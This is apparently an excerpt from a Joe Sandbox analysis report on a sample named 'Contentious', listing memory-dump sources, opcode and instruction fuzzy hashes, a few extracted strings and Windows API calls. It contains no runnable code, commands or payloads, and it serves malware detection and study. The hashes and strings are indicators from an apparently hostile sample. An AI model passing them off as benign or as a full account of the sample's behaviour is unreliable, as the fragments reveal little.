                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction ID: f28e3593fe72fa88d01303aa629bfae6551304820caee053d49813df3e18db6a
                                            • Opcode Fuzzy Hash: e72e59f555a85d1b49548c48dc107e5efb7d269c6a0859656746b6fab20b6e51
                                            • Instruction Fuzzy Hash: C8A13371E00228CBEB28CFA8C8547ADBBB1FF44305F11816ED856BB281D7785A96DF44
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction ID: 40010b11bd5e1f261aed15f7e9cc202cac7d7d8c55991c62282cde7851584d9c
                                            • Opcode Fuzzy Hash: bb414ef0e65bf321abf07bbd08e76edc2da0d3e12e8fed8c444c6e9114ba168f
                                            • Instruction Fuzzy Hash: 56911070E00228CBEF28CF98C8547ADBBB1FF44305F15816AD856BB291D7786A96DF44
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction ID: a4dec85b4f2f277edf9575adfc9b4107c5501948401582118949625260c0d92c
                                            • Opcode Fuzzy Hash: a5fb046d9c3c9ca283d4840ae6e8db3033aada834af1b2e0d9ecb340531529c3
                                            • Instruction Fuzzy Hash: A4814471E04228CBEF24CFA8C8447ADBBB1FF44305F25816AD856BB281D7785A96DF44
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4161f4b48ad52b85f764ef67eee8988566d0e70674352aa9bcb003f0198d5343
                                            • Instruction ID: dc611af4e4960d843407fd220347fea674e86b773e62b692a16a99b1be24d87e
                                            • Opcode Fuzzy Hash: 4161f4b48ad52b85f764ef67eee8988566d0e70674352aa9bcb003f0198d5343
                                            • Instruction Fuzzy Hash: 00815671E04228DBEF24CFA8D8447ADBBB0FF44301F21816AD856BB281D7785A96DF44
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: acbe30f518018ad0c1a364654cf67894e7733891be0c42920e0fe83b48f95201
                                            • Instruction ID: 3610b17f62bca192734b572b66cd3339a03013c9b6e0bb783a95e3f6acf6850f
                                            • Opcode Fuzzy Hash: acbe30f518018ad0c1a364654cf67894e7733891be0c42920e0fe83b48f95201
                                            • Instruction Fuzzy Hash: 32711371E00228CBEF24CF98C8547ADBBB1FF48305F25806AD856BB281D7785A96DF54
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6de570ad3fa47dcd8052fca1d6f9ef5d62ad7600836d6af3ef364bc7296d0c5e
                                            • Instruction ID: 83e3d6ef8d3793d26f8235816f1baf137dce58f43e4cd213034e7b89034c8eed
                                            • Opcode Fuzzy Hash: 6de570ad3fa47dcd8052fca1d6f9ef5d62ad7600836d6af3ef364bc7296d0c5e
                                            • Instruction Fuzzy Hash: A6713471E04228CBEF28CF98C854BADBBB1FF44305F25806AD856BB281D7785996DF44
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f306a4bb0e5613ad4ec4576fd476604cb5277217a9209ae60d5df005b7fe234b
                                            • Instruction ID: 6cf9b392ad20ce94c36697269ad81bf6fab0dda8c890a4cc081d40373e766ecd
                                            • Opcode Fuzzy Hash: f306a4bb0e5613ad4ec4576fd476604cb5277217a9209ae60d5df005b7fe234b
                                            • Instruction Fuzzy Hash: 61714571E00228CBEF28CF98C8547ADBBB1FF44305F15806AD856BB281D7786A56DF44
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                            • API String ID: 0-2732225958
                                            • Opcode ID: 0bd5d42d3ab929817062b5898016490bdd04b590fd2493646be318d22480eec9
                                            • Instruction ID: 051f65a748c4da729b32b5344808ce3aace142631dedd76a34ca56f720dfcc20
                                            • Opcode Fuzzy Hash: 0bd5d42d3ab929817062b5898016490bdd04b590fd2493646be318d22480eec9
                                            • Instruction Fuzzy Hash: 2F511B76E04218CFDF658B68C85437E7BB2FB8A302F1445A9C8199B251DF308D89CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$F$F$F
                                            • API String ID: 0-357777271
                                            • Opcode ID: f6db8f5af6bbbf6ab865ea36725e6382b09f7f277dfeae731be1ffad45098b67
                                            • Instruction ID: 5faa996209f4a0bf752bc8108fd15f3169c211853329d3a08689d3dc217fb5a3
                                            • Opcode Fuzzy Hash: f6db8f5af6bbbf6ab865ea36725e6382b09f7f277dfeae731be1ffad45098b67
                                            • Instruction Fuzzy Hash: 5C219D34A04348EFCB16DFB4D0516EE7BB1EB86306F1085A9D8559B346DB38AA09CF41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                            • API String ID: 0-3001612457
                                            • Opcode ID: 56bc684085ae1ab1cdf4c27a66fda89f87534728fa33c578c088315b102a3619
                                            • Instruction ID: 18fcfd9b0d87917ddaa3ded3db9e5c2bc3b80b5fa1e8bebec8c8d5842e4de071
                                            • Opcode Fuzzy Hash: 56bc684085ae1ab1cdf4c27a66fda89f87534728fa33c578c088315b102a3619
                                            • Instruction Fuzzy Hash: 94019E31710124DF8B688A2CC44492977EAAF98B62365426AF922CF2E0DF61DC4987C0
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                            • lstrcmpiA.KERNEL32(00405C24,00000000), ref: 00405A12
                                            • CharNextA.USER32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A23
                                            • lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923739251.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.2923712064.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923763293.0000000000407000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923793517.0000000000409000.00000008.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.000000000044F000.00000002.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2923828015.0000000000491000.00000002.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_Contentious.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                            • Instruction ID: 4323e886e6002e66b9621bf4ea28c9688caf2d9046ca4a9676cfc0c1aa02b3f6
                                            • Opcode Fuzzy Hash: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                            • Instruction Fuzzy Hash: 1CF0C231604458AFC7029BA8DD8099FBBA8EF06364B2141A5F801F7211D274EE019FA9